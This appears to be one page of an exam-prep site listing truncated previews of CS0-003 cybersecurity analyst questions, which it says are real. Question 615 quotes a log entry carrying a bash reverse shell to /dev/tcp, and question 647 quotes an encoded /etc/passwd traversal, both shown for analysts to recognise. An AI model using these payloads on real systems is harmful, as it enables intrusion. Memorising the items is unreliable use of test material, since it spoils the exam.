CS0-003 Exam Questions
658 real CS0-003 exam questions with expert-verified answers and explanations. Page 13 of 14.
- Question #610 (Incident Response and Management)
  Which of the following best explains the importance of playbooks for incident response teams?
  Tags: incident response playbooks, incident management, operational efficiency
- Question #611 (Security Operations)
  Alerts from the security dashboard are reporting a cloud-based host is suspected to be corrupt. The OS is not loading. The initial investigation concludes that the OS files were mo...
  Tags: FIM, file integrity monitoring, cloud security, security controls
- Question #612 (Security Operations)
  A company received a shipment of new network switches. Immediately after installing the switches, a security analyst notices suspicious traffic coming from one of the new switches....
  Tags: supply chain attack, threat actor, network security
- Question #613 (Security Operations)
  Which of the following best describes the benefit of implementing a PAM solution?
  Tags: PAM, privileged access management, access control
- Question #614 (Incident Response and Management)
  During the triage of a SIEM alarm, a security analyst identifies the following activity on a .bash_history file: Which of the following actions should the analyst take?
  Tags: SIEM triage, bash history, data exfiltration, incident response
- Question #615 (Security operations)
  A security analyst identifies the following log entry in the web server logs: 10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+- i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%2...
  Tags: web server logs, RCE, reverse shell, lateral movement
- Question #616 (Security operations)
  A security analyst receives an alert with the following packet capture: Which of the following conclusions should the analyst reach about this incident?
  Tags: packet capture, Nmap, network scanning, reconnaissance
- Question #617 (Incident Response and Management)
  An after-action review of a ransomware attack on a company identified deficiencies in responsiveness and consistency. Which of the following choices would best facilitate improveme...
  Tags: SOAR, incident response, automation, ransomware
- Question #618 (Incident Response and Management)
  A security analyst is performing a malware analysis on a device and receives the following instructions: - Reduce the blast radius of the potential threat. - Preserve forensic data...
  Tags: malware analysis, EDR, containment, forensics
- Question #619 (Incident Response and Management)
  Which of the following is the practice of controlling how evidence is handled to ensure its integrity during an investigation?
  Tags: chain of custody, evidence integrity, forensics
- Question #620 (Security operations)
  A SOC analyst is reviewing the weekly EDR report. The report shows that the same application was blocked once every 24 hours. Which of the following tools should the analyst use to...
  Tags: scheduled tasks, endpoint monitoring, Windows tools
- Question #621 (Security operations)
  A finance department employee opens an unsolicited email that contains a malicious payload. The payload quickly spreads through the finance department, but does not affect other de...
  Tags: network segmentation, malware propagation, blast radius
- Question #622 (Incident Response and Management)
  A security analyst is responding to an incident that is related to an unauthorized communication between systems. While triaging the event, the analyst obtains the following output...
  Tags: process management, Linux commands, incident response, containment
- Question #623 (Security operations)
  Which of the following explains why a company would consider enriching data before sending it to the SIEM?
  Tags: SIEM, data enrichment, log analysis, threat intelligence
- Question #624 (Security operations)
  A company suspects a coordinated effort to attack their platform. Web server logs show malicious activity from many different source IP addresses located in different countries. Wh...
  Tags: threat intelligence, IoCs, SIEM, attack correlation
- Question #625 (Vulnerability Management)
  The DevSecOps team is remediating an SSRF issue on the company's public-facing website. Which of the following is the best mitigation technique to address this issue?
  Tags: SSRF, WAF, web application security, vulnerability mitigation
- Question #626 (Incident Response and Management)
  A SOC manager is looking for a solution that can improve the response time and execute predetermined instructions. Which of the following is the best solution based on these requir...
  Tags: SOAR, incident response, automation, orchestration
- Question #627 (Security operations)
  Which of the following is the best technical method to protect sensitive data at an organizational level?
  Tags: DLP, data protection, sensitive data, data exfiltration
- Question #628 (Security operations)
  A company wants to grant access to identity administrators who are completing similar tasks. Which of the following access control models should the company use?
  Tags: RBAC, access control, identity management
- Question #629 (Reporting and Communication)
  An organization's Chief Information Security Officer (CISO) is organizing a tabletop drill. The CISO has included several other executives in the meeting invitation for the drill,...
  Tags: tabletop exercise, crisis communication, incident response, stakeholder management
- Question #630 (Security operations)
  An organization wants to implement an identity and access management technology that is resistant to phishing attacks. Which of the following is the best technology to implement?
  Tags: passwordless authentication, phishing resistance, IAM, MFA
- Question #631 (Security operations)
  A security analyst discovers that, over three months, an attacker has slowly created multiple accounts on a web server while avoiding detection. Which of the following best describ...
  Tags: Threat actors, Advanced Persistent Threat (APT), Cybersecurity threats, Threat intelligence
- Question #632 (Security Operations)
  A SOC manager who recently switched companies notices that their new company's SOC analysts have significantly poorer operational metrics compared to their previous company, withou...
  Tags: SOC operations, SOAR, team morale, operational efficiency
- Question #633 (Incident Response and Management)
  The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help with this effort?
  Tags: SOAR, phishing incidents, triage time, incident response automation
- Question #634 (Vulnerability Management)
  A security analyst is testing a web application for vulnerabilities using Burp Suite. During the assessment, a capture of the following HTTP request and response is shown in the co...
  Tags: web application security, CSRF, Burp Suite, vulnerability testing
- Question #635 (Security operations)
  When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management...
  Tags: IAM, cloud migration, SaaS security, ZTNA
- Question #636 (Security operations)
  A security analyst is working on a suspicious email forwarded from a user. The email contains an attachment asking the user to open it. Which of the following should the security a...
  Tags: DMARC, email authentication, attack origin, email security
- Question #637 (Security operations)
  A company discovers that its proprietary information is being sold on the dark web. A security analyst uses threat hunting to search for signs of compromise. After running a networ...
  Tags: data exfiltration, threat hunting, network packet capture, ICMP tunneling
- Question #638 (Incident Response Management)
  An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: - Captures live memory and an image of...
  Tags: chain of custody, digital forensics, evidence handling, incident investigation
- Question #639 (Vulnerability Management)
  A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runs a scan to receive the follow...
  Tags: vulnerability identification, plaintext credentials, network scanning, log analysis
- Question #640 (Vulnerability Management)
  A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improve security. Which of...
  Tags: vulnerability prioritization, risk assessment, remediation planning
- Question #641 (Incident Response Management)
  To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing in emergency situations or incide...
  Tags: tabletop exercise, incident response plan, emergency preparedness, regulatory compliance
- Question #642 (Security operations)
  During a routine review of DNS logs, a security analyst observes that Host X has been making frequent DNS requests to domains with random alphanumeric strings (e.g., atd8ekthj.xyz)...
  Tags: DNS anomalies, C2 communication, threat intelligence, host compromise
- Question #643 (Security operations)
  The website of a large retail chain is failing to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is the best corrective a...
  Tags: HTTPS enforcement, HSTS, web server security, secure configuration
- Question #644 (Security operations)
  A security analyst investigates a malware alert from a critical system. The following information is present in the ticket: Which of the following should the analyst do first?
  Tags: malware analysis, incident investigation, alert triage, security operations
- Question #645 (Vulnerability Management)
  An application security analyst needs to test a web application for input validation vulnerabilities. The analyst does not have the source code and does not have documentation for...
  Tags: fuzzing, input validation, application security testing, vulnerability testing
- Question #646 (Vulnerability Management)
  A security analyst is comparing the results of the past and current active credentialed vulnerability scans: Past scan: Current scan: Which of the following should the analyst do n...
  Tags: vulnerability scanning, risk reporting, remediation validation, management communication
- Question #647 (Security operations)
  An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been discovered. Which of the fo...
  Tags: directory traversal, web server logs, reconnaissance, attack identification
- Question #648 (Vulnerability Management)
  The security team is reviewing a list of vulnerabilities present on the environment, and they want to prioritize the remediation based on the CVSS v4.0 metrics: Which of the follow...
  Tags: CVSS, vulnerability prioritization, risk management, remediation
- Question #649 (Security operations)
  A security analyst is investigating an unusually high volume of requests received on a web server. Based on the following command and output: Which of the following best describes...
  Tags: directory brute force, web server logs, attack identification, command-line analysis
- Question #650 (Security operations)
  A security analyst discovers multiple log entries from a recently acquired tool that was bundled as a YUM package. Those entries point to attempts of privilege escalation. Which of...
  Tags: privilege escalation, package integrity, GPG check, vulnerability analysis
- Question #651 (Security operations)
  A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools should the company implem...
  Tags: DLP, data loss prevention, security controls, information protection
- Question #652 (Vulnerability Management)
  A security analyst is implementing a process to perform vulnerability management on an OT environment: - Systems must remain on an isolated network. - The process should focus on e...
  Tags: OT security, vulnerability management, agentless sensors, network segmentation
- Question #653 (Vulnerability Management)
  Hotspot Question. A healthcare organization must develop an action plan based on the findings from a risk assessment. The action plan must consist of a recommended list of security...
  Tags: risk assessment, security controls, remediation, data deidentification
- Question #654 (Vulnerability Management)
  A managed service provider manages servers in customer-assigned Internet Protocol spaces. The provider discovers that these servers are not included in scheduled network scans, but...
  Tags: agent-based scanning, vulnerability scanning, network scanning, customer permissions
- Question #655 (Incident Response Management)
  An organization's security operations center (SOC) team prioritizes confidentiality and integrity over monetary considerations. The SOC team contains a quickly progressing ransomwa...
  Tags: risk appetite, ransomware incident, incident impact, organizational priorities
- Question #656 (Vulnerability Management)
  A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the following information:...
  Tags: Vulnerability prioritization, CVSS scoring, Vulnerability assessment, Risk analysis
- Question #657 (Security operations)
  Which of the following should a cybersecurity analyst utilize when a notification is inaccurate?
  Tags: Alert management, SIEM tuning, False positives, Security operations
- Question #658 (Security operations)
  Which of the following are characteristics of Zero Trust Network Access?
  Tags: Zero Trust Architecture, Network security, ZTNA principles
- Question #659 (Incident Response Management)
  A security operations (SOC) manager develops response mechanisms as part of playbook development efforts. The SOC manager needs to accomplish the following: - Document adversarial...
  Tags: Cyber Kill Chain, Threat intelligence frameworks, Adversarial tactics, Playbook development